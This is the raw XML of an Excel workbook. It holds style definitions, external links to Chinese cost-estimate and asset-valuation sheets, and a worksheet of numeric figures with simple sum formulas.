    <xf numFmtId="0" fontId="14" fillId="9" borderId="23" xfId="23" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="15"/>
    <xf numFmtId="0" fontId="14" fillId="8" borderId="9" xfId="23" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"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7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment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0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>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2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="17" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="35">
    <cellStyle name="_Book1" xfId="1"/>
    <cellStyle name="_Book1_1" xfId="2"/>
    <cellStyle name="_ET_STYLE_NoName_00_" xfId="3"/>
    <cellStyle name="0,0_x000d_&#10;NA_x000d_&#10;" xfId="4"/>
    <cellStyle name="e鯪9Y_x000b_" xfId="5"/>
    <cellStyle name="Grey" xfId="6"/>
    <cellStyle name="Input [yellow]" xfId="7"/>
    <cellStyle name="Normal - Style1" xfId="8"/>
    <cellStyle name="Normal_0105第二套审计报表定稿" xfId="9"/>
    <cellStyle name="Percent [2]" xfId="10"/>
    <cellStyle name="百分比" xfId="11" builtinId="5"/>
    <cellStyle name="差_Book1" xfId="12"/>
    <cellStyle name="差_Book1_1" xfId="13"/>
    <cellStyle name="差_Book1_2" xfId="14"/>
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规_申报___专业技术资格人员综合情况一览表" xfId="15"/>
    <cellStyle name="好_Book1" xfId="16"/>
    <cellStyle name="好_Book1_1" xfId="17"/>
    <cellStyle name="콤마 [0]_BOILER-CO1" xfId="18"/>
    <cellStyle name="콤마_BOILER-CO1" xfId="19"/>
    <cellStyle name="통화 [0]_BOILER-CO1" xfId="20"/>
    <cellStyle name="통화_BOILER-CO1" xfId="21"/>
    <cellStyle name="표준_0N-HANDLING " xfId="22"/>
    <cellStyle name="표준_kc-elec system check list" xfId="23"/>
    <cellStyle name="霓付 [0]_97MBO" xfId="24"/>
    <cellStyle name="霓付_97MBO" xfId="25"/>
    <cellStyle name="烹拳 [0]_97MBO" xfId="26"/>
    <cellStyle name="烹拳_97MBO" xfId="27"/>
    <cellStyle name="普通_ 白土" xfId="28"/>
    <cellStyle name="千分位[0]_ 白土" xfId="29"/>
    <cellStyle name="千分位_ 白土" xfId="30"/>
    <cellStyle name="千位[0]_laroux" xfId="31"/>
    <cellStyle name="千位_laroux" xfId="32"/>
    <cellStyle name="钎霖_laroux" xfId="33"/>
    <cellStyle name="样式 1" xfId="3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24037;&#31243;&#31639;&#31295;\wsl\bf\&#26500;&#30382;&#28393;&#24341;&#27700;&#21457;&#30005;&#31995;&#32479;\&#26500;&#30382;&#28393;&#24341;&#27700;&#21457;&#30005;&#31995;&#32479;&#65288;&#21407;&#3129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lly\cmhk-2000\&#21271;&#20140;&#31227;&#21160;\7.23&#27719;&#24635;&#34920;(&#21331;&#24503;)\&#35780;&#20272;&#22266;&#23450;&#36164;&#201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A09\&#30005;&#35805;&#26126;&#32454;&#34920;\&#33487;&#24030;&#65288;&#26080;&#27719;&#24635;,&#21556;&#27743;&#32447;&#36335;&#20462;&#25913;&#65289;\&#24066;&#26412;&#37096;\&#27743;&#33487;&#33487;&#24030;&#26412;&#37096;&#65288;&#20013;&#22830;&#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定额"/>
      <sheetName val="台时"/>
      <sheetName val="材料"/>
      <sheetName val="工程量清单1"/>
      <sheetName val="工程量清单2"/>
      <sheetName val="钢管加工厂"/>
      <sheetName val="压力钢管制作单价"/>
      <sheetName val="安装单价2"/>
      <sheetName val="安装单价"/>
      <sheetName val="单价L"/>
      <sheetName val="单价2"/>
      <sheetName val="Sheet2"/>
      <sheetName val="Sheet4"/>
      <sheetName val="单价n2"/>
      <sheetName val="单价n3"/>
      <sheetName val="单价n1"/>
      <sheetName val="单价X"/>
      <sheetName val="单价1"/>
      <sheetName val="报价汇总表"/>
      <sheetName val="总价单价"/>
      <sheetName val="报价基础"/>
      <sheetName val="主材价计算"/>
      <sheetName val="台时汇总"/>
      <sheetName val="单价汇总"/>
      <sheetName val="运杂费汇总"/>
      <sheetName val="进退场费"/>
      <sheetName val="资金流"/>
      <sheetName val="材料用量"/>
      <sheetName val="取费"/>
      <sheetName val="素砼单价"/>
      <sheetName val="工时费"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2">
        <row r="2">
          <cell r="C2" t="str">
            <v>二○○三年十月十一日</v>
          </cell>
        </row>
        <row r="3">
          <cell r="D3">
            <v>6.32</v>
          </cell>
        </row>
        <row r="4">
          <cell r="D4">
            <v>5.21</v>
          </cell>
        </row>
        <row r="5">
          <cell r="D5">
            <v>4.42</v>
          </cell>
        </row>
        <row r="6">
          <cell r="D6">
            <v>3.95</v>
          </cell>
        </row>
        <row r="336">
          <cell r="D336">
            <v>0.56200000000000006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externalBook xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
</externalLink>
</file>

<file path=xl/externalLinks/externalLink3.xml><?xml version="1.0" encoding="utf-8"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <externalBook xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1">
    <sheetNames>
      <sheetName val="      "/>
      <sheetName val="评估结果分类汇总表"/>
      <sheetName val="流动资产汇总表"/>
      <sheetName val="流动资产--货币"/>
      <sheetName val="流动资产--货币 (2)"/>
      <sheetName val="流动资产--货币 (3)"/>
      <sheetName val="短投汇总表"/>
      <sheetName val="短投"/>
      <sheetName val="短投 (2)"/>
      <sheetName val="流动资产--票据"/>
      <sheetName val="流动资产--应收"/>
      <sheetName val="流动资产--备用金"/>
      <sheetName val="流动资产--其他应收 (2)"/>
      <sheetName val="流动资产--其他应收"/>
      <sheetName val="流动资产--存货"/>
      <sheetName val="流动资产-库存材料"/>
      <sheetName val="流动资产-材料采购"/>
      <sheetName val="流动资产-在库低值"/>
      <sheetName val="流动资产-商品采购"/>
      <sheetName val="流动资产-委托加工材料"/>
      <sheetName val="流动资产-库存商品"/>
      <sheetName val="流动资产-附属生产"/>
      <sheetName val="流动资产-出租商品"/>
      <sheetName val="流动资产-在用低值"/>
      <sheetName val="流动资产--待摊"/>
      <sheetName val="流动资产--待处理"/>
      <sheetName val="一年到期长期债券"/>
      <sheetName val="其他流动资产"/>
      <sheetName val="长期投资汇总表"/>
      <sheetName val="长期投资--股票"/>
      <sheetName val="长期投资--债券"/>
      <sheetName val="长期投资--其他投资"/>
      <sheetName val="固定资产汇总表"/>
      <sheetName val="房屋建筑物"/>
      <sheetName val="构筑物"/>
      <sheetName val="机器设备"/>
      <sheetName val="车辆"/>
      <sheetName val="电子设备"/>
      <sheetName val="电源设备"/>
      <sheetName val="电信机械设备"/>
      <sheetName val="线路设备"/>
      <sheetName val="固定_土地"/>
      <sheetName val="土建工程"/>
      <sheetName val="设备安装"/>
      <sheetName val="固定资产清理"/>
      <sheetName val="待处理固定资产"/>
      <sheetName val="土地使用权"/>
      <sheetName val="其他无形资产"/>
      <sheetName val="开办费"/>
      <sheetName val="长期待摊费用"/>
      <sheetName val="其他长期资产"/>
      <sheetName val="递延税款借项"/>
      <sheetName val="流动负债汇总表"/>
      <sheetName val="短期借款"/>
      <sheetName val="应付票据"/>
      <sheetName val="应付帐款"/>
      <sheetName val="预收帐款"/>
      <sheetName val="Sheet2"/>
      <sheetName val="其他应付款"/>
      <sheetName val="应付工资"/>
      <sheetName val="应付福利费"/>
      <sheetName val="未交税金"/>
      <sheetName val="收支差额"/>
      <sheetName val="未付利润"/>
      <sheetName val="其它未交款"/>
      <sheetName val="预提费用"/>
      <sheetName val="一年内到期长期负债"/>
      <sheetName val="其他流动负债"/>
      <sheetName val="长期负债汇总表"/>
      <sheetName val="长期借款"/>
      <sheetName val="应付债券"/>
      <sheetName val="长期应付款"/>
      <sheetName val="其他长期负债"/>
      <sheetName val="递延税款贷项"/>
      <sheetName val="XL4Popp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row r="39">
          <cell r="C39" t="b">
            <v>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2:Z17"/>
  <sheetViews>
    <sheetView topLeftCell="B1" zoomScale="110" zoomScaleNormal="110" workbookViewId="0">
      <selection activeCell="H18" sqref="H18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="4.625" customWidth="1"/>
    <col min="2" max="2" width="7.125" customWidth="1"/>
    <col min="3" max="3" width="7.875" customWidth="1"/>
    <col min="4" max="4" width="7.25" customWidth="1"/>
    <col min="5" max="5" width="6.875" customWidth="1"/>
    <col min="6" max="7" width="6.25" customWidth="1"/>
    <col min="8" max="8" width="6.5" customWidth="1"/>
    <col min="9" max="11" width="6.125" customWidth="1"/>
    <col min="12" max="14" width="6.375" customWidth="1"/>
    <col min="15" max="20" width="6.25" customWidth="1"/>
    <col min="21" max="21" width="7.5" customWidth="1"/>
    <col min="22" max="22" width="7.125" customWidth="1"/>
    <col min="23" max="23" width="6.625" customWidth="1"/>
    <col min="24" max="24" width="6.75" customWidth="1"/>
    <col min="25" max="25" width="6.875" customWidth="1"/>
    <col min="26" max="26" width="7.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:26" ht="17.25" customHeight="1">
      <c r="B2" s="5" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="2:26" ht="29.25" customHeight="1">
      <c r="E3" s="70" t="s">
        <v>1</v>
      </c>
      <c r="F3" s="70"/>
      <c r="G3" s="70"/>
      <c r="H3" s="70"/>
      <c r="I3" s="70"/>
      <c r="J3" s="70"/>
      <c r="K3" s="70"/>
      <c r="L3" s="70"/>
      <c r="M3" s="70"/>
      <c r="N3" s="70"/>
      <c r="O3" s="70"/>
      <c r="P3" s="70"/>
      <c r="Q3" s="70"/>
      <c r="R3" s="70"/>
      <c r="S3" s="70"/>
      <c r="T3" s="70"/>
      <c r="U3" s="70"/>
      <c r="V3" s="70"/>
      <c r="W3" s="70"/>
    </row>
    <row r="4" spans="2:26" ht="18.75" customHeight="1">
      <c r="W4" s="71" t="s">
        <v>2</v>
      </c>
      <c r="X4" s="71"/>
    </row>
    <row r="5" spans="2:26" ht="23.25" customHeight="1">
      <c r="B5" s="75" t="s">
        <v>3</v>
      </c>
      <c r="C5" s="72" t="s">
        <v>4</v>
      </c>
      <c r="D5" s="73"/>
      <c r="E5" s="73"/>
      <c r="F5" s="73"/>
      <c r="G5" s="73"/>
      <c r="H5" s="74"/>
      <c r="I5" s="72" t="s">
        <v>5</v>
      </c>
      <c r="J5" s="73"/>
      <c r="K5" s="73"/>
      <c r="L5" s="73"/>
      <c r="M5" s="73"/>
      <c r="N5" s="74"/>
      <c r="O5" s="72" t="s">
        <v>6</v>
      </c>
      <c r="P5" s="73"/>
      <c r="Q5" s="73"/>
      <c r="R5" s="73"/>
      <c r="S5" s="73"/>
      <c r="T5" s="74"/>
      <c r="U5" s="72" t="s">
        <v>7</v>
      </c>
      <c r="V5" s="73"/>
      <c r="W5" s="73"/>
      <c r="X5" s="73"/>
      <c r="Y5" s="73"/>
      <c r="Z5" s="74"/>
    </row>
    <row r="6" spans="2:26" ht="37.5" customHeight="1">
      <c r="B6" s="76"/>
      <c r="C6" s="77" t="s">
        <v>8</v>
      </c>
      <c r="D6" s="78"/>
      <c r="E6" s="78"/>
      <c r="F6" s="79" t="s">
        <v>9</v>
      </c>
      <c r="G6" s="78"/>
      <c r="H6" s="80"/>
      <c r="I6" s="77" t="s">
        <v>8</v>
      </c>
      <c r="J6" s="78"/>
      <c r="K6" s="78"/>
      <c r="L6" s="79" t="s">
        <v>9</v>
      </c>
      <c r="M6" s="78"/>
      <c r="N6" s="80"/>
      <c r="O6" s="77" t="s">
        <v>8</v>
      </c>
      <c r="P6" s="78"/>
      <c r="Q6" s="78"/>
      <c r="R6" s="79" t="s">
        <v>9</v>
      </c>
      <c r="S6" s="78"/>
      <c r="T6" s="80"/>
      <c r="U6" s="77" t="s">
        <v>8</v>
      </c>
      <c r="V6" s="78"/>
      <c r="W6" s="78"/>
      <c r="X6" s="79" t="s">
        <v>9</v>
      </c>
      <c r="Y6" s="78"/>
      <c r="Z6" s="80"/>
    </row>
    <row r="7" spans="2:26" ht="16.5" customHeight="1">
      <c r="B7" s="76"/>
      <c r="C7" s="21" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="E7" s="7" t="s">
        <v>12</v>
      </c>
      <c r="F7" s="7" t="s">
        <v>10</v>
      </c>
      <c r="G7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="H7" s="22" t="s">
        <v>12</v>
      </c>
      <c r="I7" s="21" t="s">
        <v>10</v>
      </c>
      <c r="J7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="K7" s="7" t="s">
        <v>12</v>
      </c>
      <c r="L7" s="7" t="s">
        <v>10</v>
      </c>
      <c r="M7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="N7" s="22" t="s">
        <v>12</v>
      </c>
      <c r="O7" s="21" t="s">
        <v>10</v>
      </c>
      <c r="P7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="Q7" s="7" t="s">
        <v>12</v>
      </c>
      <c r="R7" s="7" t="s">
        <v>10</v>
      </c>
      <c r="S7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="T7" s="22" t="s">
        <v>12</v>
      </c>
      <c r="U7" s="21" t="s">
        <v>10</v>
      </c>
      <c r="V7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="W7" s="7" t="s">
        <v>12</v>
      </c>
      <c r="X7" s="7" t="s">
        <v>10</v>
      </c>
      <c r="Y7" s="7" t="s">
        <v>11</v>
      </c>
      <c r="Z7" s="22" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="8" spans="2:26">
      <c r="B8" s="14" t="s">
        <v>13</v>
      </c>
      <c r="C8" s="21">
        <v>4.0999999999999996</v>
      </c>
      <c r="D8" s="7">
        <v>3.6</v>
      </c>
      <c r="E8" s="7">
        <v>3.6</v>
      </c>
      <c r="F8" s="7">
        <v>13.1</v>
      </c>
      <c r="G8" s="7">
        <v>13.1</v>
      </c>
      <c r="H8" s="37">
        <v>7</v>
      </c>
      <c r="I8" s="21">
        <v>6.5</v>
      </c>
      <c r="J8" s="7">
        <v>5.8</v>
      </c>
      <c r="K8" s="7">
        <v>3.6</v>
      </c>
      <c r="L8" s="7">
        <v>8.4</v>
      </c>
      <c r="M8" s="7">
        <v>10.1</v>
      </c>
      <c r="N8" s="22">
        <v>12.1</v>
      </c>
      <c r="O8" s="46">
        <v>1</v>
      </c>
      <c r="P8" s="7">
        <v>0.5</v>
      </c>
      <c r="Q8" s="7">
        <v>0.6</v>
      </c>
      <c r="R8" s="7">
        <v>1.1000000000000001</v>
      </c>
      <c r="S8" s="7">
        <v>0.7</v>
      </c>
      <c r="T8" s="22">
        <v>1.1000000000000001</v>
      </c>
      <c r="U8" s="49">
        <v>11.7</v>
      </c>
      <c r="V8" s="50">
        <v>9.9</v>
      </c>
      <c r="W8" s="50">
        <v>7.8</v>
      </c>
      <c r="X8" s="50">
        <v>22.6</v>
      </c>
      <c r="Y8" s="50">
        <v>23.9</v>
      </c>
      <c r="Z8" s="53">
        <v>20.2</v>
      </c>
    </row>
    <row r="9" spans="2:26">
      <c r="B9" s="14" t="s">
        <v>14</v>
      </c>
      <c r="C9" s="38">
        <v>1</v>
      </c>
      <c r="D9" s="39">
        <v>0.87</v>
      </c>
      <c r="E9" s="39">
        <v>0.87</v>
      </c>
      <c r="F9" s="40">
        <v>3.2</v>
      </c>
      <c r="G9" s="40">
        <v>3.2</v>
      </c>
      <c r="H9" s="41">
        <v>1.71</v>
      </c>
      <c r="I9" s="47">
        <v>1.3</v>
      </c>
      <c r="J9" s="7">
        <v>1.1599999999999999</v>
      </c>
      <c r="K9" s="7">
        <v>0.72</v>
      </c>
      <c r="L9" s="7">
        <v>1.68</v>
      </c>
      <c r="M9" s="7">
        <v>2.02</v>
      </c>
      <c r="N9" s="22">
        <v>2.41</v>
      </c>
      <c r="O9" s="21">
        <v>0.3</v>
      </c>
      <c r="P9" s="7">
        <v>0.15</v>
      </c>
      <c r="Q9" s="7">
        <v>0.18</v>
      </c>
      <c r="R9" s="7">
        <v>0.33</v>
      </c>
      <c r="S9" s="7">
        <v>0.21</v>
      </c>
      <c r="T9" s="22">
        <v>0.33</v>
      </c>
      <c r="U9" s="49">
        <f>C9+I9+O9</f>
        <v>2.6</v>
      </c>
      <c r="V9" s="50">
        <f>D9+J9+P9</f>
        <v>2.1800000000000002</v>
      </c>
      <c r="W9" s="50">
        <f t="shared" ref="W9:Z15" si="0">E9+K9+Q9</f>
        <v>1.77</v>
      </c>
      <c r="X9" s="50">
        <f t="shared" si="0"/>
        <v>5.21</v>
      </c>
      <c r="Y9" s="50">
        <f t="shared" si="0"/>
        <v>5.43</v>
      </c>
      <c r="Z9" s="53">
        <f t="shared" si="0"/>
        <v>4.45</v>
      </c>
    </row>
    <row r="10" spans="2:26">
      <c r="B10" s="14" t="s">
        <v>15</v>
      </c>
      <c r="C10" s="38">
        <v>0.3</v>
      </c>
      <c r="D10" s="39">
        <v>0.26</v>
      </c>
      <c r="E10" s="39">
        <v>0.26</v>
      </c>
      <c r="F10" s="40">
        <v>0.96</v>
      </c>
      <c r="G10" s="40">
        <v>0.96</v>
      </c>
      <c r="H10" s="41">
        <v>0.51</v>
      </c>
      <c r="I10" s="47">
        <v>0.46</v>
      </c>
      <c r="J10" s="7">
        <v>0.41</v>
      </c>
      <c r="K10" s="7">
        <v>0.26</v>
      </c>
      <c r="L10" s="7">
        <v>0.6</v>
      </c>
      <c r="M10" s="7">
        <v>0.72</v>
      </c>
      <c r="N10" s="22">
        <v>0.86</v>
      </c>
      <c r="O10" s="21">
        <v>0.1</v>
      </c>
      <c r="P10" s="7">
        <v>0.05</v>
      </c>
      <c r="Q10" s="7">
        <v>0.06</v>
      </c>
      <c r="R10" s="7">
        <v>0.11</v>
      </c>
      <c r="S10" s="7">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="T10" s="22">
        <v>0.11</v>
      </c>
      <c r="U10" s="49">
        <f t="shared" ref="U10:U15" si="1">C10+I10+O10</f>
        <v>0.86</v>
      </c>
      <c r="V10" s="50">
        <f t="shared" ref="V10:V15" si="2">D10+J10+P10</f>
        <v>0.72</v>
      </c>
      <c r="W10" s="50">
        <f t="shared" si="0"/>
        <v>0.57999999999999996</v>
      </c>
      <c r="X10" s="50">
        <f t="shared" si="0"/>
        <v>1.67</v>
      </c>
      <c r="Y10" s="50">
        <f t="shared" si="0"/>
        <v>1.75</v>
      </c>
      <c r="Z10" s="53">
        <f t="shared" si="0"/>
        <v>1.48</v>
      </c>
    </row>
    <row r="11" spans="2:26">
      <c r="B11" s="14" t="s">
        <v>16</v>
      </c>
      <c r="C11" s="38">
        <v>0.88</v>
      </c>
      <c r="D11" s="39">
        <v>0.78</v>
      </c>
      <c r="E11" s="39">
        <v>0.78</v>
      </c>
      <c r="F11" s="40">
        <v>2.81</v>
      </c>
      <c r="G11" s="40">
        <v>2.81</v>
      </c>
      <c r="H11" s="41">
        <v>1.5</v>
      </c>
      <c r="I11" s="47">
        <v>1.3</v>
      </c>
      <c r="J11" s="7">
        <v>1.1599999999999999</v>
      </c>
      <c r="K11" s="7">
        <v>0.72</v>
      </c>
      <c r="L11" s="7">
        <v>1.68</v>
      </c>
      <c r="M11" s="7">
        <v>2.02</v>
      </c>
      <c r="N11" s="22">
        <v>2.42</v>
      </c>
      <c r="O11" s="21">
        <v>0.2</v>
      </c>
      <c r="P11" s="7">
        <v>0.1</v>
      </c>
      <c r="Q11" s="7">
        <v>0.12</v>
      </c>
      <c r="R11" s="7">
        <v>0.22</v>
      </c>
      <c r="S11" s="7">
        <v>0.14000000000000001</v>
      </c>
      <c r="T11" s="22">
        <v>0.22</v>
      </c>
      <c r="U11" s="49">
        <f t="shared" si="1"/>
        <v>2.38</v>
      </c>
      <c r="V11" s="50">
        <f t="shared" si="2"/>
        <v>2.04</v>
      </c>
      <c r="W11" s="50">
        <f t="shared" si="0"/>
        <v>1.62</v>
      </c>
      <c r="X11" s="50">
        <f t="shared" si="0"/>
        <v>4.71</v>
      </c>
      <c r="Y11" s="50">
        <f t="shared" si="0"/>
        <v>4.97</v>
      </c>
      <c r="Z11" s="53">
        <f t="shared" si="0"/>
        <v>4.1399999999999997</v>
      </c>
    </row>
    <row r="12" spans="2:26">
      <c r="B12" s="14" t="s">
        <v>17</v>
      </c>
      <c r="C12" s="38">
        <v>0.54</v>
      </c>
      <c r="D12" s="39">
        <v>0.47</v>
      </c>
      <c r="E12" s="39">
        <v>0.47</v>
      </c>
      <c r="F12" s="40">
        <v>1.73</v>
      </c>
      <c r="G12" s="40">
        <v>1.73</v>
      </c>
      <c r="H12" s="41">
        <v>0.92</v>
      </c>
      <c r="I12" s="47">
        <v>0.75</v>
      </c>
      <c r="J12" s="7">
        <v>0.67</v>
      </c>
      <c r="K12" s="7">
        <v>0.41</v>
      </c>
      <c r="L12" s="7">
        <v>0.97</v>
      </c>
      <c r="M12" s="7">
        <v>1.1599999999999999</v>
      </c>
      <c r="N12" s="22">
        <v>1.39</v>
      </c>
      <c r="O12" s="21">
        <v>0.1</v>
      </c>
      <c r="P12" s="7">
        <v>0.05</v>
      </c>
      <c r="Q12" s="7">
        <v>0.06</v>
      </c>
      <c r="R12" s="7">
        <v>0.11</v>
      </c>
      <c r="S12" s="7">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="T12" s="22">
        <v>0.11</v>
      </c>
      <c r="U12" s="49">
        <f t="shared" si="1"/>
        <v>1.39</v>
      </c>
      <c r="V12" s="50">
        <f t="shared" si="2"/>
        <v>1.19</v>
      </c>
      <c r="W12" s="50">
        <f t="shared" si="0"/>
        <v>0.94</v>
      </c>
      <c r="X12" s="50">
        <f t="shared" si="0"/>
        <v>2.81</v>
      </c>
      <c r="Y12" s="50">
        <f t="shared" si="0"/>
        <v>2.96</v>
      </c>
      <c r="Z12" s="53">
        <f t="shared" si="0"/>
        <v>2.42</v>
      </c>
    </row>
    <row r="13" spans="2:26">
      <c r="B13" s="14" t="s">
        <v>18</v>
      </c>
      <c r="C13" s="38">
        <v>0.57999999999999996</v>
      </c>
      <c r="D13" s="39">
        <v>0.51</v>
      </c>
      <c r="E13" s="39">
        <v>0.51</v>
      </c>
      <c r="F13" s="40">
        <v>1.85</v>
      </c>
      <c r="G13" s="40">
        <v>1.85</v>
      </c>
      <c r="H13" s="41">
        <v>0.99</v>
      </c>
      <c r="I13" s="47">
        <v>0.98</v>
      </c>
      <c r="J13" s="7">
        <v>0.88</v>
      </c>
      <c r="K13" s="7">
        <v>0.54</v>
      </c>
      <c r="L13" s="7">
        <v>1.27</v>
      </c>
      <c r="M13" s="7">
        <v>1.53</v>
      </c>
      <c r="N13" s="22">
        <v>1.83</v>
      </c>
      <c r="O13" s="21">
        <v>0.1</v>
      </c>
      <c r="P13" s="7">
        <v>0.05</v>
      </c>
      <c r="Q13" s="7">
        <v>0.06</v>
      </c>
      <c r="R13" s="7">
        <v>0.11</v>
      </c>
      <c r="S13" s="7">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="T13" s="22">
        <v>0.11</v>
      </c>
      <c r="U13" s="49">
        <f t="shared" si="1"/>
        <v>1.66</v>
      </c>
      <c r="V13" s="50">
        <f t="shared" si="2"/>
        <v>1.44</v>
      </c>
      <c r="W13" s="50">
        <f t="shared" si="0"/>
        <v>1.1100000000000001</v>
      </c>
      <c r="X13" s="50">
        <f t="shared" si="0"/>
        <v>3.23</v>
      </c>
      <c r="Y13" s="50">
        <f t="shared" si="0"/>
        <v>3.45</v>
      </c>
      <c r="Z13" s="53">
        <f t="shared" si="0"/>
        <v>2.93</v>
      </c>
    </row>
    <row r="14" spans="2:26">
      <c r="B14" s="14" t="s">
        <v>19</v>
      </c>
      <c r="C14" s="38">
        <v>0.48</v>
      </c>
      <c r="D14" s="39">
        <v>0.42</v>
      </c>
      <c r="E14" s="39">
        <v>0.42</v>
      </c>
      <c r="F14" s="40">
        <v>1.53</v>
      </c>
      <c r="G14" s="40">
        <v>1.53</v>
      </c>
      <c r="H14" s="41">
        <v>0.82</v>
      </c>
      <c r="I14" s="47">
        <v>1.02</v>
      </c>
      <c r="J14" s="7">
        <v>0.91</v>
      </c>
      <c r="K14" s="7">
        <v>0.56999999999999995</v>
      </c>
      <c r="L14" s="7">
        <v>1.32</v>
      </c>
      <c r="M14" s="7">
        <v>1.59</v>
      </c>
      <c r="N14" s="22">
        <v>1.91</v>
      </c>
      <c r="O14" s="21">
        <v>0.1</v>
      </c>
      <c r="P14" s="7">
        <v>0.05</v>
      </c>
      <c r="Q14" s="7">
        <v>0.06</v>
      </c>
      <c r="R14" s="7">
        <v>0.11</v>
      </c>
      <c r="S14" s="7">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="T14" s="22">
        <v>0.11</v>
      </c>
      <c r="U14" s="49">
        <f t="shared" si="1"/>
        <v>1.6</v>
      </c>
      <c r="V14" s="50">
        <f t="shared" si="2"/>
        <v>1.38</v>
      </c>
      <c r="W14" s="50">
        <f t="shared" si="0"/>
        <v>1.05</v>
      </c>
      <c r="X14" s="50">
        <f t="shared" si="0"/>
        <v>2.96</v>
      </c>
      <c r="Y14" s="50">
        <f t="shared" si="0"/>
        <v>3.19</v>
      </c>
      <c r="Z14" s="53">
        <f t="shared" si="0"/>
        <v>2.84</v>
      </c>
    </row>
    <row r="15" spans="2:26">
      <c r="B15" s="35" t="s">
        <v>20</v>
      </c>
      <c r="C15" s="42">
        <v>0.32</v>
      </c>
      <c r="D15" s="43">
        <v>0.28999999999999998</v>
      </c>
      <c r="E15" s="43">
        <v>0.28999999999999998</v>
      </c>
      <c r="F15" s="44">
        <v>1.02</v>
      </c>
      <c r="G15" s="44">
        <v>1.02</v>
      </c>
      <c r="H15" s="45">
        <v>0.55000000000000004</v>
      </c>
      <c r="I15" s="48">
        <v>0.69</v>
      </c>
      <c r="J15" s="32">
        <v>0.61</v>
      </c>
      <c r="K15" s="32">
        <v>0.38</v>
      </c>
      <c r="L15" s="32">
        <v>0.89</v>
      </c>
      <c r="M15" s="32">
        <v>1.06</v>
      </c>
      <c r="N15" s="33">
        <v>1.28</v>
      </c>
      <c r="O15" s="31">
        <v>0.1</v>
      </c>
      <c r="P15" s="32">
        <v>0.05</v>
      </c>
      <c r="Q15" s="32">
        <v>0.06</v>
      </c>
      <c r="R15" s="32">
        <v>0.11</v>
      </c>
      <c r="S15" s="32">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="T15" s="33">
        <v>0.11</v>
      </c>
      <c r="U15" s="51">
        <f t="shared" si="1"/>
        <v>1.1100000000000001</v>
      </c>
      <c r="V15" s="52">
        <f t="shared" si="2"/>
        <v>0.95</v>
      </c>
      <c r="W15" s="52">
        <f t="shared" si="0"/>
        <v>0.73</v>
      </c>
      <c r="X15" s="52">
        <f t="shared" si="0"/>
        <v>2.02</v>
      </c>
      <c r="Y15" s="52">
        <f t="shared" si="0"/>
        <v>2.15</v>
      </c>
      <c r="Z15" s="54">
        <f t="shared" si="0"/>
        <v>1.94</v>
      </c>
    </row>
    <row r="16" spans="2:26">
      <c r="Z16" s="55"/>
    </row>
    <row r="17" spans="3:24">
      <c r="C17" s="81" t="s">
        <v>21</v>
      </c>
      <c r="D17" s="81"/>
      <c r="E17" s="81"/>
      <c r="F17" s="81"/>
      <c r="G17" s="81"/>
      <c r="H17" s="81"/>
      <c r="I17" s="81"/>
      <c r="J17" s="81"/>
      <c r="K17" s="81"/>
      <c r="L17" s="81"/>
      <c r="M17" s="81"/>
      <c r="N17" s="81"/>
      <c r="O17" s="81"/>
      <c r="P17" s="81"/>
      <c r="Q17" s="81"/>
      <c r="R17" s="81"/>
      <c r="S17" s="81"/>
      <c r="T17" s="81"/>
      <c r="U17" s="81"/>
      <c r="V17" s="81"/>
      <c r="W17" s="81"/>
      <c r="X17" s="81"/>
    </row>
  </sheetData>
  <mergeCells count="16">
    <mergeCell ref="X6:Z6"/>
    <mergeCell ref="C17:X17"/>
    <mergeCell ref="L6:N6"/>
    <mergeCell ref="O6:Q6"/>
    <mergeCell ref="B5:B7"/>
    <mergeCell ref="C6:E6"/>
    <mergeCell ref="F6:H6"/>
    <mergeCell ref="I6:K6"/>
    <mergeCell ref="R6:T6"/>
    <mergeCell ref="U6:W6"/>
    <mergeCell ref="E3:W3"/>
    <mergeCell ref="W4:X4"/>
    <mergeCell ref="C5:H5"/>
    <mergeCell ref="I5:N5"/>
    <mergeCell ref="O5:T5"/>
    <mergeCell ref="U5:Z5"/>
  </mergeCells>
  <phoneticPr fontId="13" type="noConversion"/>
  <pageMargins left="0.69930555555555596" right="0.69930555555555596" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
